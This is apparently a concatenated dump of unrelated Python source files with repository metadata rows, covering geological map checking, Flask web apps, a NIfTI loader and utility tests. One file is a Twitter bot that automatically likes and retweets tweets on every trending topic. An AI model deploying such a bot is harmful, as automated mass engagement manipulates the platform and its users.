type=PublicationUrl.MIME_TYPE_PDF,
extraction_date=datetime.now())
for reference in references:
# TODO: check if paper already exists (!)
reference['reference']['publication_id'] = publication.id
reference['reference']['source_id'] = publication_url.id
reference['publication']['source'] = '{}:{}'.format(reference['publication']['source'], publication_url.id)
self.parser.parse(**reference)
self.parser.commit() # raises ParserRollbackError
def __store_document_meta(self, publication, document_meta):
'''
Store the extracted head meta data.
:param publication: Publication object
:param document_meta: Extracted head meta data
'''
if 'keywords' in document_meta:
for keyword in document_meta['keywords']:
keyword = normalize_string(keyword)
if len(keyword) <= 100:
publication.publicationkeyword_set.get_or_create(name=keyword)
else:
logger.info('keyword "%s" is too long' % keyword)
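# A minimal usage sketch (illustrative only; `publication` is assumed to be a
# Publication model instance and the URL is hypothetical):
#
#   extractor = PublicationDocumentExtractor(database='default')
#   stored = extractor.extract_and_store(publication, 'https://example.org/paper.pdf')
#   # `stored` is True only when the document was downloaded, matched and committed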
| 45.962406
| 135
| 0.657615
| 5,169
| 0.845575
| 0
| 0
| 0
| 0
| 0
| 0
| 2,205
| 0.360707
|
423985c9471e18c947bb00b13f5fb82114424fab
| 2,884
|
py
|
Python
|
webapp/web.py
|
thunderz99/azure_image_caption
|
f7d3649051c948c9651b7d3f9df006d84449cc14
|
[
"MIT"
] | 1
|
2019-04-19T13:22:15.000Z
|
2019-04-19T13:22:15.000Z
|
webapp/web.py
|
thunderz99/azure_image_caption
|
f7d3649051c948c9651b7d3f9df006d84449cc14
|
[
"MIT"
] | null | null | null |
webapp/web.py
|
thunderz99/azure_image_caption
|
f7d3649051c948c9651b7d3f9df006d84449cc14
|
[
"MIT"
] | null | null | null |
import sys
import os
import json
import urllib
from PIL import Image
from flask import Flask, request, redirect, url_for
from flask import send_from_directory, render_template
from werkzeug.utils import secure_filename
from datetime import datetime
from caption_service import CaptionService
from translation_service import TranslationService
sys.path.append(os.curdir)  # setting so that files in the current directory can be imported
UPLOAD_FOLDER = '/tmp/uploads'
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])
app = Flask(__name__, static_url_path='/static', static_folder='assets/static')
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
cs = CaptionService()
ts = TranslationService()
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS
@app.route('/flask/uploader', methods=['POST'])
def upload_file():
# check if the post request has the file part
# create a special subfolder for the files uploaded this time
# to avoid overwrite
subdir = datetime.now().strftime('%Y%m%d_%H%M%S')
current_files_dir = os.path.join(UPLOAD_FOLDER, subdir)
os.makedirs(current_files_dir, exist_ok=True)
upload_files = request.files.getlist('file[]')
ret = []
for file in upload_files:
image = {}
print('filename is', file.filename)
filename = secure_filename(file.filename)
image['filename'] = filename
filepath = os.path.join(current_files_dir, filename)
print('file saving to ', filepath)
file.save(filepath)
image['url'] = '/flask/uploads/{}/{}'.format(
subdir, urllib.parse.quote_plus(filename))
print('begin predict', filepath)
caption_en, caption_ja = get_caption(filepath)
image['result'] = caption_ja
ret.append(image)
return json.dumps(ret)
@app.route('/flask/uploads/<path:filepath>')
def uploaded_file(filepath):
print("filepath is {}".format(filepath))
filename = os.path.basename(filepath)
if not filename:
return ""
path = os.path.dirname(filepath)
print("path is {}, filename is {}".format(path, filename))
image_folder = os.path.join(UPLOAD_FOLDER, path)
return send_from_directory(image_folder,
urllib.parse.unquote_plus(filename))
@app.route('/')
def serve_index():
return send_from_directory('assets', 'index.html')
@app.route('/<filename>', defaults={'filename': 'index.html'})
def serve_assets(filename):
return send_from_directory('assets', filename)
def get_caption(filepath):
print('getting caption', filepath)
caption_en = cs.get_caption(filepath)
caption_ja = ts.get_translation(caption_en)
return caption_en, caption_ja
if __name__ == '__main__':
port = os.environ.get('PORT', 5000)
app.run(host='0.0.0.0', port=port)
| 28
| 79
| 0.691054
| 0
| 0
| 0
| 0
| 1,749
| 0.597744
| 0
| 0
| 593
| 0.202666
|
423cfa9d306c6cce1a1273c94c45fb8dde9787d8
| 16,706
|
py
|
Python
|
map2loop/m2l_map_checker.py
|
Leguark/map2loop
|
365dde4490f50ad73612120a7d4bee61e54a9a18
|
[
"MIT"
] | null | null | null |
map2loop/m2l_map_checker.py
|
Leguark/map2loop
|
365dde4490f50ad73612120a7d4bee61e54a9a18
|
[
"MIT"
] | null | null | null |
map2loop/m2l_map_checker.py
|
Leguark/map2loop
|
365dde4490f50ad73612120a7d4bee61e54a9a18
|
[
"MIT"
] | null | null | null |
import geopandas as gpd
from shapely.geometry import LineString, Polygon,MultiLineString
import os.path
from map2loop import m2l_utils
import warnings
import numpy as np
import pandas as pd
#explodes polylines and modifies objectid for exploded parts
def explode_polylines(indf,c_l,dst_crs):
#indf = gpd.GeoDataFrame.from_file(indata)
outdf = gpd.GeoDataFrame(columns=indf.columns, crs=dst_crs)
for idx, row in indf.iterrows():
if type(row.geometry) == LineString:
outdf = outdf.append(row,ignore_index=True)
if type(row.geometry) == MultiLineString:
multdf = gpd.GeoDataFrame(columns=indf.columns, crs=dst_crs)
recs = len(row.geometry)
multdf = multdf.append([row]*recs,ignore_index=True)
i=0
for geom in range(recs):
multdf.loc[geom,'geometry'] = row.geometry[geom]
multdf.loc[geom,c_l['o']]=str(multdf.loc[geom,c_l['o']])+'_'+str(i)
print('map2loop warning: Fault_'+multdf.loc[geom,c_l['o']],'is one of a set of duplicates, so renumbering')
i=i+1
outdf = outdf.append(multdf,ignore_index=True)
return outdf
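# A minimal sketch of what explode_polylines does (illustrative only; the column
# name mapped by c_l['o'] and the CRS are hypothetical here):
#
#   parts = MultiLineString([LineString([(0, 0), (1, 1)]), LineString([(2, 2), (3, 3)])])
#   gdf = gpd.GeoDataFrame({'OBJECTID': ['7'], 'geometry': [parts]}, crs='EPSG:28350')
#   exploded = explode_polylines(gdf, {'o': 'OBJECTID'}, 'EPSG:28350')
#   # exploded contains two LineString rows, renumbered as OBJECTID '7_0' and '7_1'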
def check_map(structure_file,geology_file,fault_file,mindep_file,fold_file,tmp_path,bbox,c_l,dst_crs,local_paths,drift_prefix,polygo):
#y_point_list = [bbox[1], bbox[1], bbox[3], bbox[3], bbox[1]]
#x_point_list = [bbox[0], bbox[2], bbox[2], bbox[0], bbox[0]]
#bbox_geom = Polygon(zip(x_point_list, y_point_list))
#polygo = gpd.GeoDataFrame(index=[0], crs=dst_crs, geometry=[bbox_geom])
m2l_errors=[]
m2l_warnings=[]
if(local_paths):
for file_name in (structure_file,geology_file,fault_file,mindep_file,fold_file):
if not os.path.isfile(file_name):
m2l_errors.append('file '+file_name+' not found')
# Process orientation points
if (os.path.isfile(structure_file) or not local_paths):
orientations2 = gpd.read_file(structure_file,bbox=bbox)
if(c_l['sf']==c_l['ds']):
new_code='NEW_'+c_l['sf']
new_code=new_code[:10]
orientations=orientations2.rename(columns={c_l['sf']:new_code}, errors="raise")
m2l_warnings.append('To avoid conflict with geology field of same name, orientation field named "'+str(c_l['sf'])+'" renamed to "'+new_code+'"')
c_l['sf']=new_code
else:
new_code=''
orientations=orientations2.copy()
if(c_l['bo']==c_l['ds'] and not new_code==''):
c_l['bo']=new_code
if(len(orientations)<2):
m2l_errors.append('not enough orientations to complete calculations (need at least 2)')
orientations = orientations.replace(r'^\s+$', np.nan, regex=True)
orientations = orientations[orientations[c_l['d']]!=-999]
for code in ('sf','d','dd','gi'):
if not c_l[code] in orientations.columns:
if(code=='sf'):
orientations[c_l[code]]='Bed'
m2l_warnings.append('field named "'+str(c_l[code])+'" added with default value "Bed"')
elif(not code=='gi'):
m2l_errors.append('"'+c_l[code]+'" field needed')
else:
m2l_warnings.append('field named "'+str(c_l[code])+'" added with default value')
orientations[c_l[code]] = np.arange(len(orientations))
else:
nans=orientations[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of orientations file, replacing with 0')
orientations[c_l[code]].fillna("0", inplace = True)
unique_o=set(orientations[c_l['gi']])
if(not len(unique_o) == len(orientations)):
m2l_warnings.append('duplicate orientation point unique IDs')
show_metadata(orientations,"orientations layer")
# Process geology polygons
if (os.path.isfile(geology_file) or not local_paths):
geology = gpd.read_file(geology_file,bbox=bbox)
if not c_l['o'] in geology.columns:
geology = geology.reset_index()
geology[c_l['o']]=geology.index
unique_g=set(geology[c_l['o']])
if(not len(unique_g) == len(geology)):
m2l_warnings.append('duplicate geology polygon unique IDs')
nans=geology[c_l['c']].isnull().sum()
if(nans>0):
m2l_errors.append(''+str(nans)+' NaN/blank found in column "'+str(c_l['c'])+'" of geology file, please fix')
if(c_l['g']=='No_col' or not c_l['g'] in geology.columns):
m2l_warnings.append('No secondary strat coding for geology polygons')
c_l['g']='group'
geology[c_l['g']]="Top"
geology = geology.replace(r'^\s+$', np.nan, regex=True)
geology[c_l['g']].fillna(geology[c_l['g2']], inplace=True)
geology[c_l['g']].fillna(geology[c_l['c']], inplace=True)
if(c_l['r1']=='No_col' or not c_l['r1'] in geology.columns):
m2l_warnings.append('No extra litho for geology polygons')
c_l['r1']='r1'
geology[c_l['r1']]='Nope'
if(c_l['r2']=='No_col' or not c_l['r2'] in geology.columns):
m2l_warnings.append('No more extra litho for geology polygons')
c_l['r2']='r2'
geology[c_l['r2']]='Nope'
if(c_l['min']=='No_col' or not c_l['min'] in geology.columns):
m2l_warnings.append('No min age for geology polygons')
c_l['min']='min'
geology[c_l['min']]=0
if(c_l['max']=='No_col' or not c_l['max'] in geology.columns):
m2l_warnings.append('No max age for geology polygons')
c_l['max']='max'
geology[c_l['max']]=100
if(c_l['c']=='No_col' or not c_l['c'] in geology.columns):
m2l_errors.append('Must have primary strat coding field for geology polygons')
for code in ('c','g','g2','ds','u','r1'):
if(c_l[code] in geology.columns):
geology[c_l[code]].str.replace(","," ")
if(code == 'c' or code =='g' or code=='g2'):
geology[c_l[code]].str.replace(" ","_")
geology[c_l[code]].str.replace("-","_")
geology[c_l[code]].str.replace(",","_")
nans=geology[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of geology file, replacing with 0')
geology[c_l[code]].fillna("0", inplace = True)
for drift in drift_prefix:
geology=geology[~geology[c_l['u']].str.startswith(drift)]
show_metadata(geology,"geology layer")
# Process fold polylines
if (os.path.isfile(fold_file) or not local_paths):
folds = gpd.read_file(fold_file,bbox=bbox)
if(len(folds)>0):
if not c_l['o'] in folds.columns:
folds = folds.reset_index()
folds[c_l['o']]=folds.index
unique_g=set(folds[c_l['o']])
if(not len(unique_g) == len(folds)):
m2l_warnings.append('duplicate fold polyline unique IDs')
folds = folds.replace(r'^\s+$', np.nan, regex=True)
for code in ('ff','t'):
if(c_l['ff']=='No_col' or not c_l['ff'] in folds.columns):
m2l_warnings.append('No fold code for fold polylines')
c_l['ff']='ff'
folds[c_l['ff']]=c_l['fold']
if(c_l['t']=='No_col' or not c_l['t'] in folds.columns):
m2l_warnings.append('No fold polarity for fold polylines')
c_l['t']='t'
folds[c_l['t']]='None'
if(c_l[code] in folds.columns):
folds[c_l[code]].str.replace(","," ")
nans=folds[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of folds file, replacing with 0')
folds[c_l[code]].fillna("0", inplace = True)
folds_clip=m2l_utils.clip_shp(folds,polygo)
if(len(folds_clip) > 0):
folds_explode = explode_polylines(folds_clip, c_l, dst_crs)
if(len(folds_explode) > len(folds_clip)):
m2l_warnings.append(
'some folds are MultiPolyLines, and have been split')
folds_explode.crs = dst_crs
show_metadata(folds_clip,"fold layer")
else:
print('No folds in area')
# Process fault polylines
if (os.path.isfile(fault_file) or not local_paths):
faults_folds = gpd.read_file(fault_file,bbox=bbox)
faults = faults_folds[faults_folds[c_l['f']].str.contains(c_l['fault'])]
faults = faults.replace(r'^\s+$', np.nan, regex=True)
if not c_l['o'] in faults.columns:
m2l_warnings.append('field named "'+str(c_l['o'])+'" added with default value')
faults[c_l['o']] = np.arange(len(faults))
for code in ('f','o','fdip','fdipdir','fdipest'):
if(c_l['f']=='No_col' or not c_l['f'] in faults.columns ):
m2l_warnings.append('No fault type for fault polylines')
c_l['f']='ftype'
faults[c_l['f']]=c_l['fault']
if(c_l['fdip']=='No_col' or not c_l['fdip'] in faults.columns ):
m2l_warnings.append('No fault dip for fault polylines')
c_l['fdip']='fdip'
faults[c_l['fdip']]=c_l['fdipnull']
if(c_l['fdipdir']=='No_col' or not c_l['fdipdir'] in faults.columns ):
m2l_warnings.append('No fault dip direction for fault polylines')
c_l['fdipdir']='fdipdir'
faults[c_l['fdipdir']]=0
if(c_l['fdipest']=='No_col' or not c_l['fdipest'] in faults.columns ):
m2l_warnings.append('No fault dip estimate for fault polylines')
c_l['fdipest']='fdipest'
faults[c_l['fdipest']]='None'
if(c_l['fdipest_vals']=='No_col' or not c_l['fdipest_vals'] in faults.columns ):
m2l_warnings.append('No fault dip estimate text for fault polylines')
c_l['fdipest_vals']='fdipest_vals'
faults[c_l['fdipest_vals']]='None'
if(c_l['n']=='No_col' or not c_l['n'] in faults.columns ):
m2l_warnings.append('No fault name for fault polylines')
c_l['n']='fname'
faults[c_l['n']]='None'
if not c_l[code] in faults.columns:
m2l_errors.append('field named "'+str(c_l[code])+'" not found in fault/fold file')
if(c_l[code] in faults.columns):
nans=faults[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(''+str(nans)+' NaN/blank found in column "'+str(c_l[code])+'" of fault file, replacing with -999')
faults[c_l[code]].fillna("-999", inplace = True)
unique_f=set(faults[c_l['o']])
if(not len(unique_f) == len(faults)):
m2l_errors.append('duplicate fault/fold polyline unique IDs')
faults = faults.replace(r'^\s+$', np.nan, regex=True)
faults_clip=m2l_utils.clip_shp(faults,polygo)
if(len(faults_clip)>0):
faults_explode=explode_polylines(faults_clip,c_l,dst_crs)
if(len(faults_explode)>len(faults_clip)):
m2l_warnings.append('some faults are MultiPolyLines, and have been split')
faults_explode.crs = dst_crs
show_metadata(faults_explode,"fault layer")
else:
#fault_file='None'
print('No faults in area')
# Process mindep points
if (os.path.isfile(mindep_file) or not local_paths):
mindeps = gpd.read_file(mindep_file,bbox=bbox)
if(len(mindeps)==0):
m2l_warnings.append('no mindeps for analysis')
else:
mindeps = mindeps.replace(r'^\s+$', np.nan, regex=True)
for code in ('msc','msn','mst','mtc','mscm','mcom'):
if(c_l[code]=='No_col'):
mindeps[c_l[code]]='No_col'
if not c_l[code] in mindeps.columns:
m2l_errors.append('field named "'+str(c_l[code])+'" not found in mineral deposits file')
else:
nans=mindeps[c_l[code]].isnull().sum()
if(nans>0):
m2l_warnings.append(str(nans)+' NaN/blank found in column '+str(c_l[code])+' of mindep file, replacing with 0')
mindeps[c_l[code]].fillna("0", inplace = True)
show_metadata(mindeps,"mindeps layer")
# explode fault/fold multipolylines
# sometimes faults go off map and come back in again which after clipping creates multipolylines
if(len(m2l_warnings)>0):
print("\nWarnings:")
warnings.warn('The warnings listed above were issued')
for w in m2l_warnings:
print(" ",w)
if(len(m2l_errors)>0):
print("\nErrors:")
warnings.warn('The errors listed above must be fixed prior to rerunning map2loop')
for e in m2l_errors:
print(" ",e)
raise NameError('map2loop error: Fix errors before running again')
if(len(m2l_errors)==0):
if(len(folds_clip)>0):
fold_file=tmp_path+'folds_clip.shp'
folds_explode=folds_explode.dropna(subset=['geometry'])
folds_explode.to_file(fold_file)
else:
fold_file=tmp_path+'fold_clip.shp'
print("\nFold layer metadata\n--------------------")
print("No folds found")
if(len(faults_clip)>0):
fault_file=tmp_path+'faults_clip.shp'
faults_explode.crs=dst_crs
faults_explode=faults_explode.dropna(subset=['geometry'])
faults_explode.to_file(fault_file)
else:
fault_file=tmp_path+'faults_clip.shp'
print("\nFault layer metadata\n--------------------")
print("No faults found")
geol_clip=gpd.overlay(geology, polygo, how='intersection')
if(len(geol_clip)>0):
geol_clip.crs=dst_crs
geol_file=tmp_path+'geol_clip.shp'
geol_clip.to_file(geol_file)
if(len(orientations)>0):
structure_file=tmp_path+'structure_clip.shp'
orientations.crs=dst_crs
orientations[c_l['dd']] = pd.to_numeric(orientations[c_l['dd']])
orientations[c_l['d']] = pd.to_numeric(orientations[c_l['d']])
orientations.to_file(structure_file)
if(len(mindeps)>0):
mindep_file=tmp_path+'mindeps_clip.shp'
mindeps.crs=dst_crs
mindeps.to_file(mindep_file)
print('\nNo errors found, clipped and updated files saved to tmp')
return(structure_file,geol_file,fault_file,mindep_file,fold_file,c_l)
def show_metadata(gdf,name):
if(len(gdf)>0):
print("\n",name," metadata\n--------------------")
print(" bbox",gdf.total_bounds)
print(" CRS",gdf.crs)
print(" # items",len(gdf))
types=[]
for i,g in gdf.iterrows():
if(not g.geometry.type in types):
types.append(g.geometry.type)
print(" Data types",types)
else:
print("\n",name," metadata\n--------------------")
print(" empty file, check contents")
| 44.079156
| 160
| 0.534359
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,152
| 0.248533
|
423dba72ede1b75a23e84d734d1a416227c1565d
| 2,116
|
py
|
Python
|
DeepBrainSeg/readers/nib.py
|
JasperHG90/DeepBrainSeg
|
92cf5f758f115e7ac51202966a1287fb58c09d78
|
[
"MIT"
] | 130
|
2019-04-09T02:35:44.000Z
|
2022-02-26T15:53:19.000Z
|
DeepBrainSeg/readers/nib.py
|
koriavinash1/DeepMedX
|
02fcee6d7b21b16e7f1e28089f24be56ef6b9383
|
[
"MIT"
] | 11
|
2019-09-18T03:55:29.000Z
|
2021-01-03T13:11:20.000Z
|
DeepBrainSeg/readers/nib.py
|
koriavinash1/DeepMedX
|
02fcee6d7b21b16e7f1e28089f24be56ef6b9383
|
[
"MIT"
] | 38
|
2018-11-28T01:34:41.000Z
|
2022-01-17T03:53:47.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# author: Avinash Kori
# contact: koriavinash1@gmail.com
# MIT License
# Copyright (c) 2020 Avinash Kori
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import tempfile
from time import time
import datetime
import numpy as np
import nibabel as nib
class nib_loader(object):
"""
"""
def __init__(self):
pass
def load_vol(self, path):
"""
path : patient data path
returns numpy array of patient data
"""
self.patient = nib.load(path)
self.affine = self.patient.affine
return self.patient.get_data()
def write_vol(self, path, volume):
"""
path : path to write the data
        volume : modified volume to write
return: True or False based on saving of volume
"""
try:
volume = np.uint8(volume)
volume = nib.Nifti1Image(volume, self.affine)
volume.set_data_dtype(np.uint8)
nib.save(volume, path)
return True
        except Exception:
return False
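# A minimal usage sketch (hypothetical file paths):
#
#   loader = nib_loader()
#   volume = loader.load_vol('patient_flair.nii.gz')
#   ok = loader.write_vol('patient_flair_copy.nii.gz', volume)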
| 30.666667
| 80
| 0.676749
| 796
| 0.376181
| 0
| 0
| 0
| 0
| 0
| 0
| 1,449
| 0.684783
|
423ee3e6a6459504377643bd233fea0f011a4f80
| 259
|
py
|
Python
|
tensorflow/intro/main.py
|
donutloop/machine_learning_examples
|
46192a57e2dd194925ae76d6bfb169cd2af142dd
|
[
"MIT"
] | 1
|
2018-10-08T18:24:40.000Z
|
2018-10-08T18:24:40.000Z
|
tensorflow/intro/main.py
|
donutloop/machine_learning_examples
|
46192a57e2dd194925ae76d6bfb169cd2af142dd
|
[
"MIT"
] | null | null | null |
tensorflow/intro/main.py
|
donutloop/machine_learning_examples
|
46192a57e2dd194925ae76d6bfb169cd2af142dd
|
[
"MIT"
] | 1
|
2018-10-09T06:50:48.000Z
|
2018-10-09T06:50:48.000Z
|
import os
import tensorflow as tf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
x1 = tf.constant(5)
x2 = tf.constant(6)
result = tf.multiply(x1, x2)
print(result)
with tf.Session() as sess:
output = sess.run(result)
print(output)
| 15.235294
| 40
| 0.683398
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 25
| 0.096525
|
423f75233120c5c9e5189a28dbf159544fa15eba
| 845
|
py
|
Python
|
twitter-bots/auto_liker.py
|
debasish-dutta/Python-projects
|
e06710ba47b37d42d83bd1859c46023513ea1c80
|
[
"MIT"
] | null | null | null |
twitter-bots/auto_liker.py
|
debasish-dutta/Python-projects
|
e06710ba47b37d42d83bd1859c46023513ea1c80
|
[
"MIT"
] | null | null | null |
twitter-bots/auto_liker.py
|
debasish-dutta/Python-projects
|
e06710ba47b37d42d83bd1859c46023513ea1c80
|
[
"MIT"
] | null | null | null |
import auth_key
import tweepy
import time
auth = tweepy.OAuthHandler(auth_key.API_key, auth_key.API_secret_key)
auth.set_access_token(auth_key.Access_token, auth_key.Access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)
user = api.me()
indId = 2282863
india_trend = api.trends_place(indId)
tweetNo = 5
a =[]
trndInd = api.trends_place(indId)
for trend in trndInd[0]['trends']:
a.append(trend['name'])
for item in a:
print(item)
for tweet in tweepy.Cursor(api.search, item).items(tweetNo):
try:
print("tweet liked & retweeted")
tweet.favorite()
tweet.retweet()
time.sleep(10)
except tweepy.TweepError as e:
print(e.reason)
except StopIteration:
break
| 24.852941
| 80
| 0.647337
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 39
| 0.046154
|
423f9534e4fce6ed19f5f3059bb0ba6698e76415
| 745
|
py
|
Python
|
ds_discovery/engines/distributed_mesh/domain_products/controller/src/controller.py
|
project-hadron/discovery-transition-ds
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
[
"BSD-3-Clause"
] | 2
|
2020-09-21T17:24:16.000Z
|
2021-05-28T18:02:54.000Z
|
ds_discovery/engines/distributed_mesh/domain_products/controller/src/controller.py
|
project-hadron/discovery-transition-ds
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
[
"BSD-3-Clause"
] | null | null | null |
ds_discovery/engines/distributed_mesh/domain_products/controller/src/controller.py
|
project-hadron/discovery-transition-ds
|
08229ca3b7617b42ce2dd8e47ff93876c0843810
|
[
"BSD-3-Clause"
] | 1
|
2021-07-23T13:52:04.000Z
|
2021-07-23T13:52:04.000Z
|
from ds_discovery import Controller
import os
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
warnings.simplefilter(action='ignore', category=DeprecationWarning)
__author__ = 'Darryl Oatridge'
def domain_controller():
# Controller
uri_pm_repo = os.environ.get('HADRON_PM_REPO', None)
controller = Controller.from_env(uri_pm_repo=uri_pm_repo, default_save=False, has_contract=True)
run_book = os.environ.get('HADRON_CONTROLLER_RUNBOOK', None)
repeat = os.environ.get('HADRON_CONTROLLER_REPEAT', None)
sleep = os.environ.get('HADRON_CONTROLLER_SLEEP', None)
controller.run_controller(run_book=run_book, repeat=repeat, sleep=sleep)
if __name__ == '__main__':
domain_controller()
| 32.391304
| 100
| 0.777181
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.2
|
423fee1037a4130b27a1927c09025e289e851a6f
| 1,491
|
py
|
Python
|
utils_test.py
|
lostsquirrel/words
|
aaa4bb2b3a9c8c7c7300e29ec73f39cff4409b8d
|
[
"MIT"
] | null | null | null |
utils_test.py
|
lostsquirrel/words
|
aaa4bb2b3a9c8c7c7300e29ec73f39cff4409b8d
|
[
"MIT"
] | null | null | null |
utils_test.py
|
lostsquirrel/words
|
aaa4bb2b3a9c8c7c7300e29ec73f39cff4409b8d
|
[
"MIT"
] | null | null | null |
import json
import unittest
from utils import CustomEncoder, Paging, ValidationError, generate_uuid, Validator
class UtilsTest(unittest.TestCase):
def test_uuid(self):
print(generate_uuid())
self.assertEqual(len(generate_uuid()), 32)
    def test_validate(self):
form = dict(
a=1,
b=2,
c=3
)
v = Validator().rule("a").rule("b").rule("c").rule("d", False, 4)
_a, _b, _c, _d = v.validate_form(form)
self.assertEqual(_a, 1)
self.assertEqual(_b, 2)
self.assertEqual(_c, 3)
self.assertEqual(_d, 4)
def test_validate_none_form(self):
v = Validator().rule("page", False, 1).rule("per_page", False, 10)
page, per_page = v.validate_form(None)
self.assertEqual(page, 1)
self.assertEqual(per_page, 10)
def test_validate_none_form_required(self):
v = Validator().rule("page")
try:
v.validate_form(None)
except ValidationError as e:
print(e)
try:
v.validate_form(dict(size=2))
except ValidationError as e:
print(e)
def test_extend(self):
try:
[].extend(None)
except TypeError as e:
print(e)
def test_paging(self):
p = Paging(101, 1, 10)
print(json.dumps(p.__dict__))
def test_json_encode(self):
p = Paging(101, 1, 10)
print(CustomEncoder().encode(p))
| 26.625
| 82
| 0.564051
| 1,368
| 0.917505
| 0
| 0
| 0
| 0
| 0
| 0
| 34
| 0.022803
|
424044b56baa6c4ca720ef729a7deb71c15b2301
| 1,342
|
py
|
Python
|
src/pyclean/cli.py
|
uranusjr/pyclean-py
|
ba3f4674d02fde396391e0f16906bd2b9cf7cd2d
|
[
"ISC"
] | null | null | null |
src/pyclean/cli.py
|
uranusjr/pyclean-py
|
ba3f4674d02fde396391e0f16906bd2b9cf7cd2d
|
[
"ISC"
] | null | null | null |
src/pyclean/cli.py
|
uranusjr/pyclean-py
|
ba3f4674d02fde396391e0f16906bd2b9cf7cd2d
|
[
"ISC"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import logging
import os
import sys
from . import entries, meta
logger = logging.getLogger(__name__)
def build_parser():
prog = os.path.basename(sys.argv[0])
if prog not in ("pyclean", "pyclean.py"):
prog = "pyclean"
parser = argparse.ArgumentParser(prog=prog)
parser.add_argument(
"entries", nargs="+", metavar="DIR_OR_FILE",
)
parser.add_argument(
"-v", "--verbose", dest="verbose",
action="store_true", help="be verbose",
)
parser.add_argument(
"--version", action="version",
version="%(prog)s, version {}".format(meta.__version__),
)
return parser
def parse_args(argv):
parser = build_parser()
options = parser.parse_args(argv)
return options
def setup_logging(options):
if options.verbose:
logging.root.setLevel(logging.DEBUG)
form = "%(levelname).1s: %(module)s:%(lineno)d: %(message)s"
else:
logging.root.setLevel(logging.INFO)
form = "%(message)s"
logging.basicConfig(format=form)
def main(argv=None):
options = parse_args(argv)
setup_logging(options)
if options.verbose:
logger.debug("options: %s", options.__dict__)
entries.clean(options.entries)
if __name__ == '__main__':
main()
| 21.301587
| 68
| 0.632638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.207154
|
4240a3a135f3d439bdb928b669c203c2c5a8b79b
| 6,890
|
py
|
Python
|
app.py
|
ZhongxuanWang/simple_web_remainder-python
|
e61f9cf05d464fa55ae628fe415ea164f7574cde
|
[
"MIT"
] | null | null | null |
app.py
|
ZhongxuanWang/simple_web_remainder-python
|
e61f9cf05d464fa55ae628fe415ea164f7574cde
|
[
"MIT"
] | null | null | null |
app.py
|
ZhongxuanWang/simple_web_remainder-python
|
e61f9cf05d464fa55ae628fe415ea164f7574cde
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template, url_for, redirect, request
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
from dateutil.relativedelta import relativedelta
from demail import demail
__author__ = 'Zhongxuan Wang'
__doc__ = 'Never Forget online reminder'
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///list.db'
# Remember: every time you change the columns (such as adding or removing a column, or changing a value),
# you have to do the following: open a terminal from PyCharm, start python3.7, run `from app import db`, `db.create_all()` and exit.
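# For reference, those steps as a Python-shell sketch (assuming this module is importable as `app`):
#
#   $ python3.7
#   >>> from app import db
#   >>> db.create_all()
#   >>> exit()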
db = SQLAlchemy(app)
db.create_all()
datetime_format = '%b-%d-%Y %H:%M'
'''
This part requires your email information in order to receive email notifications. (This is left blank intentionally)
'''
email_account = ''
email_password = ''
# TODO: send an email warning if the task is due soon and still incomplete
class TODO(db.Model):
id = db.Column(db.Integer, primary_key=True)
content = db.Column(db.String(500), nullable=False)
time_created_str = datetime.now().strftime("%B-%d-%Y %H:%M:%S")
time_created = db.Column(db.String, default=time_created_str)
time_due = db.Column(db.String(500), nullable=False)
# By default, the email warning is disabled
email_warning = db.Column(db.Integer, default=0)
def __repr__(self):
return self.id
def __str__(self):
return self.__repr__()
def get_time_color(self):
time_dif = self.get_time_difference()
if time_dif['days'] < 0 or time_dif['seconds'] < 0:
return 'black'
elif time_dif['days'] > 30:
return "#0000ff"
elif time_dif['days'] > 7:
return "#0080ff"
elif time_dif['days'] > 2:
return '#00ff00'
elif time_dif['days'] >= 1:
return '#bfff00'
# >Half day
elif time_dif['seconds'] >= 43200:
return "#ffff00"
# >3h
elif time_dif['seconds'] >= 10800:
send_email(self)
return "#ffbf00"
# >1h
elif time_dif['seconds'] >= 3600:
send_email(self)
return "#ff8000"
else:
send_email(self)
return "#ff0000"
def get_time_difference(self):
